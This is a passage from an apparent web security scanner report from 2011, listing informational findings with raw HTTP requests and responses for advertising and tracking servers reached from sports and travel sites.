Referer: http://ib.adnxs.com/if?enc=znuEnuzW1T-HFtnO91PTPwAAAGBmZvY_aFoouqpj1D-qm4u_7QnXPxv3XqCB24t0cEeI8W8QIlnC-IhOAAAAAE1ECABlAQAAbAEAAAIAAACyGQkAPWQAAAAAAABVU0QAVVNEANgCWgD8AdsEbBEBAgUCAQQAAAAAHifUFwAAAAA.&pubclick=http://bid.openx.net/click?cd%3DH4sIAAAAAAAAABXLuQ0CQQwF0L9cGmnbILXktedyQAsU4TkkQiogpa5tglYIES9_KxYA18hqI1elPlul2FjIRBt55OzszqIl4HB_f_cVx__w5KOrCHGPk2bNTDMNo20zLlWs9JwCTkC5BZyxfF4BF-D5wA90U0FEcwAAAA%3D%3D%26dst%3D&tt_code=goal.com&udj=uf%28%27a%27%2C+1008%2C+1317599426%29%3Buf%28%27c%27%2C+117682%2C+1317599426%29%3Buf%28%27g%27%2C+51717%2C+1317599426%29%3Buf%28%27r%27%2C+596402%2C+1317599426%29%3Bppv%2815221%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815223%2C+%278398047279950264091%27%2C+1317599426%2C+1317685826%2C+117682%2C+25661%2C+0%29%3Bppv%2815225%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815227%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815229%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815231%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3B&cnd=!xCOKHwiylwcQsrMkGAAgvcgBMAA4_ANAAEjsAlAAWABgeGgAcAB4AIABAIgBAJABAZgBAaABAagBA7ABALkBxSCwcmiRzT_BAVgGUQHvCdc_yQGamZmZmZnxP9kBf_s6cM6I5D_gAdQv&ccd=!sAQDJgiylwcQsrMkGL3IASAA&referrer=http://www.goal.com&media_subtypes=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7472
Set-Cookie: id=ca5b4d83c000017||t=1317599554|et=730|cs=002213fd4884e3bed7d9e725fe; path=/; domain=.doubleclick.net; expires=Tue, 01 Oct 2013 23:52:34 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sat, 01 Oct 2011 23:52:34 GMT
Date: Sun, 02 Oct 2011 23:52:34 GMT
Expires: Sun, 02 Oct 2011 23:52:34 GMT
Cache-Control: private

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
27.3. http://ad.doubleclick.net/adi/N6054.Invitemedia.com/B5912738.28  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6054.Invitemedia.com/B5912738.28

Request

GET /adi/N6054.Invitemedia.com/B5912738.28;sz=300x250;pc=[TPAS_ID];click=http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwdjEsOgzAMBa.CvCYS8Qe_cJvQpCvUXVdV747NyjPS8_xIhI6lQWtbFxIOgZsywmoIYb7Awl5aNxQ9ey_gsZWJOcYb2qcb5WuO3XjztOxk0OLK_tQ08PO9rsA9sJqK._8GBj4bwg--&redirectURL=;ord=8ec82327-9a58-4baa-82d0-e8eddf84ae75? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7661
Set-Cookie: id=c28c1d83c000039||t=1317600006|et=730|cs=002213fd48e65c670a029fff3e; path=/; domain=.doubleclick.net; expires=Wed, 02 Oct 2013 00:00:06 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 02 Oct 2011 00:00:06 GMT
Date: Mon, 03 Oct 2011 00:00:06 GMT
Expires: Mon, 03 Oct 2011 00:00:06 GMT
Cache-Control: private

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
27.4. http://ad.doubleclick.net/adi/N6054.Invitemedia.com/B5912738.30  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6054.Invitemedia.com/B5912738.30

Request

GET /adi/N6054.Invitemedia.com/B5912738.30;sz=728x90;pc=[TPAS_ID];click=http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjDEOhDAMBL.CXBMpWduxw2_IARW6jgrd38.udkba3ZeYaVuGSxvrQowQNxWktRBCvQA4l30cUqTrUXY7ZznlqlOrf2wy5TTLpqiWlj95oZHc4YES.H3uO7AHNhU2_P7igxtH&redirectURL=;ord=20f22283-a9d4-465d-a7eb-e4f0b508c7b3? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://d.tradex.openx.com/afr.php?zoneid=6393&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7636
Date: Sun, 02 Oct 2011 23:59:52 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
27.5. http://ad.doubleclick.net/adi/N6333.1207.TRAVELOCITY.COM/B5568861.2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6333.1207.TRAVELOCITY.COM/B5568861.2

Request

GET /adi/N6333.1207.TRAVELOCITY.COM/B5568861.2;sz=160x600;click=http://dm.travelocity.com/event.ng/Type%3dclick%26FlightID%3d127075%26AdID%3d169968%26TargetID%3d32592%26Segments%3d1,9,889,3090,3199,4300,4303,5796,5909,9520,10495,10506,11148,12670,13933,16594,17659,20052,20299,20311,20993,21150,21265,21649,21682,22041,22251,22308,22422,22551,22552,22607,22609,22612,22652,22783,22972,22974,23041,23043,23055,23123,23137,23138,23153,23212%26Targets%3d8858,11482,8427,8852,28340,30402,30431,31767,31928,32592,33460,33543,34010,8830,34059,34011,34009,33719,34787,33164,34632%26Values%3d25,60,80,92,101,150,152,194,208,215,232,261,264,2176,2218,2285,2305,2306,2307,2308,2310,2340,2342,2343,2359,2432,2468,2537,4760,4772,6472,6474,6510,6974,8829,9080,9119,9844,9845,9846,11161,12194,12196,12728,12736,12804%26Redirect%3d;ord=badigyw,bhirWrczqllc? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=771877&tile=128609801075344&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1266
Date: Mon, 03 Oct 2011 00:14:33 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/
...[SNIP]...
27.6. http://ad.doubleclick.net/adi/gna.en/level2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/gna.en/level2

Request

GET /adi/gna.en/level2;tile=5;sz=160x600;ord=940345?area=2l&pos=2&league=epl&ord=940345 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 562
Date: Mon, 03 Oct 2011 00:00:10 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><script type="text/javascript"><!--
   e9 = new Object();
e9
...[SNIP]...
27.7. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Request

GET /iframe3?sIBdAD10IABKKqQAAAAAAD9DKAAAAAAAAAD8AQYAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABWlIC2a93RChYjAkZYQYlvVHyaUTyyLANlDidrAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6511%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D728x90%26_salt%3D31903434%26r%3D0%26s%3D2126909,659e43ce-ed51-11e0-8f45-78e7d1f5b944,1317599467411 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=728x90&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:53:59 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0389.rm.sp2
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Sun, 02 Oct 2011 23:53:59 GMT
Pragma: no-cache
Content-Length: 105
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body><!-- Delivery record decoding failed with reason = 4 (Query string expired) --></body></html>
27.8. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Request

GET /PortalServe/?pid=1399334Q81720110831160016&flash=10&time=0|18:49|-5&redir=http://cdslog.contextweb.com/CDSLogger/L.aspx?q=C~538936~3448~59764~134043~106934~3~345~25~premierleague.com~2~8~1~0~2~1~-HAZoarNoKZDius-txPklIg7Z5oU_7wk6upA9MEPZ1w^~19~2~5ZvoQhA3FQCr~PpAVCxNh2PJr~1~1~1~~http%3A%2F%2Fbh.contextweb.com%2Fbh%2Fset.aspx%3Faction%3Dadd%26advid%3D3448%26token%3DTTCL1%26rurl%3D$CTURL$&data=345&r=0.26698742574080825 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=FC84F463-F810-4805-B5C6-DA875B835084; PRbu=ErB40RtCA; PRvt=CFJ9xErENUwPwYAcUBBeJ6TErNHYxA5IBd7BCeJ5DErTb9CAIFAC9BBeJ7WErTb9avgKAAGBBeJNRErllKsxwcASKBBe; PRgo=BBBAAsJvCBVBF4FRCDhFS!B; PRimp=59AE0400-B34A-1C1C-0309-3510048A0101; PRca=|AJoR*343:1|AKjB*15:2|AK9q*1646:2|AK73*1646:1|AKdX*1153:2|AKfC*298:1|AK8l*9320:1|AJtM*1737:2|AJsM*154:1|AKln*9320:3|AKgy*39173:1|AKfq*9:2|AKcV*1774:3|#; PRcp=|AJoRAAF7:1|AKjBAAF7:1|AKjBAAAP:1|AK9qAA08:2|AK73AA08:1|AKdXAASb:2|AKfCAAEo:1|AK8lAC0U:1|AJtMAA2B:2|AJsMAAC4:1|AKlnAC0U:3|AKgyAKLp:1|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#; PRpl=|FiNl:1|FwPI:1|FwO9:1|FeMB:1|FeMC:1|FdKz:1|FjZG:1|Fj1N:1|FnKl:1|Fgi2:1|FrMI:1|FrMW:1|F2Bj:1|FrlJ:3|Fqr0:1|Fqqc:1|Fqqq:1|Fhqf:3|#; PRcr=|Fz7o:1|GYaN:2|GRns:1|GRno:1|GRQ2:1|GUPB:1|GUPA:1|GVWz:1|GWPi:1|GJ9J:1|GMBD:1|GMud:1|GW7X:3|GV2B:1|GV12:2|GSur:3|#; PRpc=|FiNlFz7o:1|FwPIGYaN:1|FwO9GYaN:1|FeMBGRns:1|FeMCGRno:1|FdKzGRQ2:1|FjZGGUPB:1|Fj1NGUPA:1|FnKlGVWz:1|Fgi2GWPi:1|FrMIGJ9J:1|FrMWGMBD:1|F2BjGMud:1|FrlJGW7X:3|Fqr0GV2B:1|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 02 Oct 2011 23:49:37 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 4218
Set-Cookie:PRvt=CGJ9xErENUwPwYAcUBBeJ6TErNHYxA5IBd7BCeJ5DErTb9CAIFAC9BBeJ7WErTb9avgKAAGBBeJNRErllKsxwcASKBBeKG9ErlmC1SzbAB3BAe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRgo=BBBAAsJvCBVBF4FRCDhFS!B;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=59AE0400-D582-DB2C-030A-1BD000770100; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKlp*1278:2|AJoR*343:1|AKjB*15:2|AK9q*1646:2|AK73*1646:1|AKdX*1153:2|AKfC*298:1|AK8l*9320:1|AJtM*1737:2|AJsM*154:1|AKln*9320:3|AKgy*39173:1|AKfq*9:2|AKcV*1774:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKlpAAUc:2|AJoRAAF7:1|AKjBAAF7:1|AKjBAAAP:1|AK9qAA08:2|AK73AA08:1|AKdXAASb:2|AKfCAAEo:1|AK8lAC0U:1|AJtMAA2B:2|AJsMAAC4:1|AKlnAC0U:3|AKgyAKLp:1|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FsBu:2|FiNl:1|FwPI:1|FwO9:1|FeMB:1|FeMC:1|FdKz:1|FjZG:1|Fj1N:1|FnKl:1|Fgi2:1|FrMI:1|FrMW:1|F2Bj:1|FrlJ:3|Fqr0:1|Fqqc:1|Fqqq:1|Fhqf:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GWZl:2|Fz7o:1|GYaN:2|GRns:1|GRno:1|GRQ2:1|GUPB:1|GUPA:1|GVWz:1|GWPi:1|GJ9J:1|GMBD:1|GMud:1|GW7X:3|GV2B:1|GV12:2|GSur:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FsBuGWZl:2|FiNlFz7o:1|FwPIGYaN:1|FwO9GYaN:1|FeMBGRns:1|FeMCGRno:1|FdKzGRQ2:1|FjZGGUPB:1|Fj1NGUPA:1|FnKlGVWz:1|Fgi2GWPi:1|FrMIGJ9J:1|FrMWGMBD:1|F2BjGMud:1|FrlJGW7X:3|Fqr0GV2B:1|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...
27.9. http://amch.questionmarket.com/adscgen/st.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/st.php

Request

GET /adscgen/st.php?survey_num=928398&site=69802575&code=44069375&randnum=823146 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1_43741102-3-1_43407814-6-1_43624044-35-1_43407795-6-1_41889545-5-1_41888765-5-2_41888152-5-1_43622021-3-1_43658050-41-1_43749713-14-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_913132-c5?|M-0_924563-#^>|M-Us_927907-{w@|M-0_926534-vu@|M-d6_910905-9d[}M-*_925788-AW'~M-0_928398-C|@~M-0_873769-]|@~M-0; LP=1317596202

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:09:55 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
DL_S: b102.dl
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Content-Length: 165
Content-Type: text/html

(function(){
if(1!=4){
(new Image).src="http://amch.questionmarket.com/adsc/d928398/20/44069375/decide.php?ord="+Math.floor((new Date()).getTime()/1000);


}
})();

27.10. http://aud.pubmatic.com/AdServer/Artemis  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://aud.pubmatic.com
Path:   /AdServer/Artemis

Request

GET /AdServer/Artemis?dpid=7&group=tech_business_professional&industry=software&location=texas HTTP/1.1
Host: aud.pubmatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ads.pubmatic.com/AdServer/js/dppix.html?p=26071&s=26072&a=21044
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_26072=TMC; KTPCACOOKIE=YES; KRTBCOOKIE_80=1336-f96ee651-9aaf-4db4-bcd2-102cf3b7c015.; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; pubfreq_26072=823-2:1098-2; PUBMDCID=1; pubfreq_26072_21044_238858273=823-1; PMDTSHR=cat:

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:13:00 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.8e-fips-rhel5 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Connection: close
Content-Type: text/html
Content-Length: 7

success
27.11. http://content.pulse360.com/0802A570-D4D3-11E0-8F5A-3A5C91016B62  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content.pulse360.com
Path:   /0802A570-D4D3-11E0-8F5A-3A5C91016B62

Request

GET /0802A570-D4D3-11E0-8F5A-3A5C91016B62 HTTP/1.1
Host: content.pulse360.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home/0,,12306,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pulse360-opt-out=1

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:49:01 GMT
Server: Barista/1.1
Connection: Keep-Alive
Content-Type: text/html
p3p: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Content-Length: 13483

document.write('<style type="text/css"> div#p360-hybrid300x250TriadBlackBlue-0802A570-D4D3-11E0-8F5A-3A5C91016B62 { width: 300px; left: 0; font-family: sans-serif; position: relative; di
...[SNIP]...
27.12. http://content.pulse360.com/D712CB66-D4D2-11E0-ACD9-355C91016B62  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content.pulse360.com
Path:   /D712CB66-D4D2-11E0-ACD9-355C91016B62

Request

GET /D712CB66-D4D2-11E0-ACD9-355C91016B62 HTTP/1.1
Host: content.pulse360.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pulse360-opt-out=1

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:58:10 GMT
Server: Barista/1.1
Connection: Keep-Alive
Content-Type: text/html
p3p: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Content-Length: 1152

document.write('<style type="text/css">.p360_adunit { border: 1px solid #ffffff; width: 466px; height: 58px; background-color: #FFFFFF;}.p360_listing { font-size: 11px; font-family: arial, helv; heigh
...[SNIP]...
27.13. http://content.pulse360.com/F09A1BDE-D4D2-11E0-99F0-875B91016B62  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content.pulse360.com
Path:   /F09A1BDE-D4D2-11E0-99F0-875B91016B62

Request

GET /F09A1BDE-D4D2-11E0-99F0-875B91016B62 HTTP/1.1
Host: content.pulse360.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/SearchResults/?searchQuery=soccor+football+goal+tv+xss&page=2229476&page=2231401&page=2232085&page=2232088&page=2232090&page=2233530&order=date
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pulse360-opt-out=1

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:51:03 GMT
Server: Barista/1.1
Connection: Keep-Alive
Content-Type: text/html
p3p: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Content-Length: 12893

document.write('<style type="text/css"> div#p360-hybrid120x600aquanotch-F09A1BDE-D4D2-11E0-99F0-875B91016B62 { width: 120px; left: 0; font-family: sans-serif; position: relative; display
...[SNIP]...
27.14. http://content1.admonkey.dapper.net/clients/expedia/Infosite_US.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content1.admonkey.dapper.net
Path:   /clients/expedia/Infosite_US.html

Request

GET /clients/expedia/Infosite_US.html HTTP/1.1
Host: content1.admonkey.dapper.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://fls.doubleclick.net/activityi;src=2588783;type=nausc547;cat=nausi164;u=CCF4A420AF8B480F8413EFB42E880287;u16=USD;u13=4215;u14=429;u11=35;u9=The%20Boston%20Park%20Plaza%20Hotel%20&%20Towers;u7=1%7C0;u6=1;u4=20111004%7C20111007;u1=Hotel;u2=178239;ord=691577950492.5012?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DAPPEROPTOUT2=OPT-OUT; expedia_bucket=a

Response

HTTP/1.1 200 OK
Server: CacheFlyServe v26b
Date: Mon, 03 Oct 2011 00:14:22 GMT
Content-Type: text/html
Connection: keep-alive
ETag: "a123520f93f435158bffb3b4123e3d12"
X-CF1: fA.lax1:cf:cacheC.lax1-01
Last-Modified: Fri, 03 Jun 2011 22:13:07 GMT
X-CF2: L
Content-Length: 2555

<html>
<body>
<script type='text/javascript'>

var cookieTTL = 365; // TTL in days

// var COOKIE_NAME = intent.getFieldValue("adId") + '_bucket';
var COOKIE_NAME = "expedia" + '_bucket';

function lo
...[SNIP]...
27.15. http://content1.admonkey.dapper.net/clients/expedia/SearchResults_US.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content1.admonkey.dapper.net
Path:   /clients/expedia/SearchResults_US.html

Request

GET /clients/expedia/SearchResults_US.html HTTP/1.1
Host: content1.admonkey.dapper.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
